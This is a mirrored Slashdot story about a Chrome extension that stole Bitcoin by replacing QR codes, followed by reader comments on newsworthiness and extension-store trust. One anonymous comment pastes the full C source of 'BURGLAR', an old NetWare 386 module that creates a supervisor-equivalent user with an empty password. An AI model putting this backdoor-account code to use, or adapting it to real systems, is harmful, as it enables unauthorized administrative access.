Slashdot Mirror

← Back to Stories (view on slashdot.org)

Google Chrome Extension Caught Stealing Bitcoin From Users (softpedia.com)

Posted by BeauHD on from the buyer-beware dept.

An anonymous reader writes: Bitcoin exchange portal Bitstamp is warning users of a Google Chrome extension that steals their Bitcoin when making a transfer. According to Bitstamp, this extension contains malicious code that is redirecting payments to its own Bitcoin address. Bitcoin web app developer Devon Weller confirmed Bitstamp's findings, saying that the extension was secretly replacing Bitcoin QR codes with its own. The extension's name is BitcoinWisdom Ads Remover and is still available on the Google Chrome Web Store. In July 2015, many users reported having similar issues with the same extension.

17 of 28 comments (clear)

  1. QR codes: by Gravis+Zero · · Score: 1

    don't trust them.

    --
    Anons need not reply. Questions end with a question mark.
  2. NEWs...the point is it's supposed to be NEW by Anonymous Coward · · Score: 1

    submitted 8 months ago to the subreddit...hardly cutting edge news.

    1. Re:NEWs...the point is it's supposed to be NEW by NotInHere · · Score: 4, Informative

      The NEWS here is that its still available for download, on march 12 2016.

    2. Re:NEWs...the point is it's supposed to be NEW by hercludes · · Score: 2

      Exactly, I'm not one to judge whether something should be on Slashdot or not, but even I have to concede that this seems wildly out of place. The plug-in itself has only 5 ratings and 94 users, maybe if there were 100,000 users or something this would be relevant, but the app is clearly dead at such low statistics. Not to mention the functionality is completely pointless, "blocks ads from bitcoinwisdom.com" -- do people just have a unique extension to block ads for each site they visit? Such a weird story to find on Slashdot.

    3. Re:NEWs...the point is it's supposed to be NEW by PinkyGigglebrain · · Score: 1

      So you don't think any effort should be made to let as many people as possible know about the danger so they can avoid the app until it gets taken down?

    4. Re:NEWs...the point is it's supposed to be NEW by Anonymous Coward · · Score: 1

      https://www.reddit.com/r/Bitco...

      The code has been cleaned out. Apparently my google account was hacked and someone uploaded this fake "update".
      My account password has been changed and a clean version of the plugin was uploaded to the chrome store again.

      so...think he was hacked again, or just bullshitting?

    5. Re:NEWs...the point is it's supposed to be NEW by Rockoon · · Score: 1

      So you don't think any effort should be made to let as many people as possible know...

      In order to let as many people as possible know, you have to literally let everyone alive know. Odds are fairly good that in order to accomplish that, the only requirement-fulfilling "any effort" is in fact "too much effort."

      I suggest that this "any effort" begins with you. I will happily join you and help as soon as I have seen that you have really committed to this endeavor. Tell you what.. if you manage to get even 10% of the way to the goal, I will promise to deliver the other 90%.

      --
      "His name was James Damore."
    6. Re:NEWs...the point is it's supposed to be NEW by drinkypoo · · Score: 1

      Exactly, I'm not one to judge whether something should be on Slashdot or not,

      Yes you are, hypocrite. You're doing it right now.

      but even I have to concede that this seems wildly out of place.

      Well, it's about security, trojans, and bitcoin. What part of that seems wildly out of place on Slashdot? Are you just upset that this isn't an article about women in coding?

      --
      "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
    7. Re:NEWs...the point is it's supposed to be NEW by hercludes · · Score: 1

      I was almost sure I was going to get a reply like this. Yes, I'm admitting that I'm going against my own standards of not judging if an article belongs on Slashdot or not. Congratulations on dissecting that for us. Anyways, I'm glad that you lack the attention of the majority of other Slashdot readers and insert "What part of that seems wildly out of place on Slashdot" before reading the next sentence where I state why it seems out of place on Slashdot. I don't know why you're projecting about women in coding, you are make rather large assumptions. I care about as much for women in coding articles as much as I do for men in coding articles.

    8. Re:NEWs...the point is it's supposed to be NEW by hercludes · · Score: 1

      So you don't think any effort should be made to let as many people as possible know about the danger so they can avoid the app until it gets taken down?

      That's a good point, I'd rather not see a post for every single new virus introduced into the google playstore. Thanks for bringing in a new perspective.

  3. 94 users by Anonymous Coward · · Score: 1

    As above.

  4. Feel the leetness by Anonymous Coward · · Score: 1

    /* BURGLAR - To recover the supervisor account of netware 386

          (c) 1990 Cyco Automation, created by Bart Mellink.
                            (My first NLM)

    */
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include

    main( int argc, char *argv[] ) {
            long task;
            char *name;

            printf("BURGLAR - Create supervisor equivalent user account\n" );
            printf(" (c) Cyco Automation (bm) 1990\n");

            task=SetCurrentTask(-1L);
            SetCurrentConnection(0); /* set connection 0 -> superuser */
            SetCtrlCharCheckMode(0); /* No abort on ctrl-c */

            name=argv[1];

            if (argc>1) { /* First create an user object in the bindery */
                    if (CreateBinderyObject(name,OT_USER,BF_STATIC,0x31)==0)
                            printf("New user %s created\n",name);
                    else
                            printf("User %s allready exists\n",name); /* User object must have an equivalent property */
                    CreateProperty(name,OT_USER,"SECURITY_EQUALS",BF_STATIC|BF_SET,0x32); /* Add supervisor equivalent to equivalence property */
                    if (AddBinderyObjectToSet(name,OT_USER,"SECURITY_EQUALS","SUPERVISOR",OT_USER)==0)
                            printf("User made supervisor equivalent\n");
                    else
                            printf("User was allready supervisor equivalent\n"); /* Create password property and make empty string */
                    if (ChangeBinderyObjectPassword(name,OT_USER,"","")==0)
                            printf("Password removed from user\n");
                    else { /* On error check if we had allready empty password */
                            if (VerifyBinderyObjectPassword(name,OT_USER,"")==0)
                                    printf("Password was allready removed from user\n");
                            else
                                    printf("Could not remove password from user\n");
                    }
            }
            else {
                    printf(" Error: Username missing from commandline\n");
            }

            ReturnBlockOfTasks(&task,1L);
            ReturnConnection( GetCurrentConnection() );
            return 0;
    }

  5. why not ABP ? by thygate · · Score: 4, Insightful

    Adblock Plus also blocks all the advertisements on bitcoinwisdom, so why would anyone bother with this extension ?

    1. Re:why not ABP ? by pD-brane · · Score: 1

      People install this, because most of them are sheep. They don't think critically. They just install anything that appears cool, or what other sheeple tell them is useful.

    2. Re:why not ABP ? by Bing+Tsher+E · · Score: 1

      Hey, Bitcoins are cool and trendy, man. Don't be dissing bitcoins.

      I use them mainly to buy and sell Magic The Gathering cards.

  6. Re:Should Google aim their penises while they piss by andymadigan · · Score: 2

    This extension does something completely different than what it claims to do, and makes no mention of this extra "feature". That should be enough to have it taken down. Google has made it essentially impossible to install extensions from outside their "store". If Google makes no representations about the quality or safety of the extensions in the store, then why not let sites host the extensions themselves?

    There's practically no information in the store to base a decision on other than the name of the author and a description. If extensions were hosted on their own sites you could at least know what organization created the extension by verifying the HTTPS cert of the site. With the store model you're trusting Google to verify the information in the store.

    --
    The right to protest the State is more sacred than the State.
  7. Talented Hackers by bennebw · · Score: 1

    Instead of being evil, why don't these talented hackers turn their powers to something for the good of humanity, like maybe a Chrome Extension that would blot out the words "Kim Kardashian" on any web page. Of course, if they're looking for a vector for their dirty deeds, that would be huge.